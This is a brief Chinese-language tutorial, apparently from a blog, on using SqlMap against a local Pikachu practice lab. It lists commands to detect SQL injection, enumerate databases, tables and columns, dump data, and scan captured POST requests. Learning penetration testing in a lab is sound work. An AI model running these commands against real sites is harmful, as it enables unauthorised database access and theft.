SQL注入之工具学习——SqlMap

一、基本使用

　　1.1 方法一（get请求）

　　python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_str.php?name=vince&submit=%E6%9F%A5%E8%AF%A2"   --batch

　　解释：-u 为目标访问url ,--batch 指的是sqlmap不会询问你的输入，全部默认确定。当你不知道要选择yes/no的时候，可以加入此参数。

     

 

 

 

 　　出现上述页面说明存在sql注入漏洞。注入类型为盲注，数据库为mysql。我们可以获取数据库。

　　>>> python sqlmap.py -u url --dbs --batch         获取数据库信息

     

　　>>>python sqlmap -u url.py --current-db --batch  获取当前数据库信息

 

 

 　　>>>python sqlmap.py -u url -D database --tables --batch  获取当前数据库的所有表信息

 

　　>>>python sqlmap.py -u url -D database -T table --columns --batch 获取数据库表字段信息

 

 

 　　>>>python sqlmap.py -u url -D database -T table -C " column_name1,column_name2"  --dump --batch 导出表字段中的内容数据。

　　--dump-all   导出全部（慎重，这个会导出所有表的数据）

　　--dump  --start 1 --stop 5   选择性导出,导出前几条数据。

 　　1.2 post请求（方法二）

　　　　如果请求参数为post，在url中不显示可结合使用burpsuit进行抓包，将抓包拦截的数据保存成txt文件直接拖至sqlmap。

　　　　>>>python sqlmap.py -r a.txt

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

　　　　如果有多个请求可以全部写到一个txt文件中进行扫描。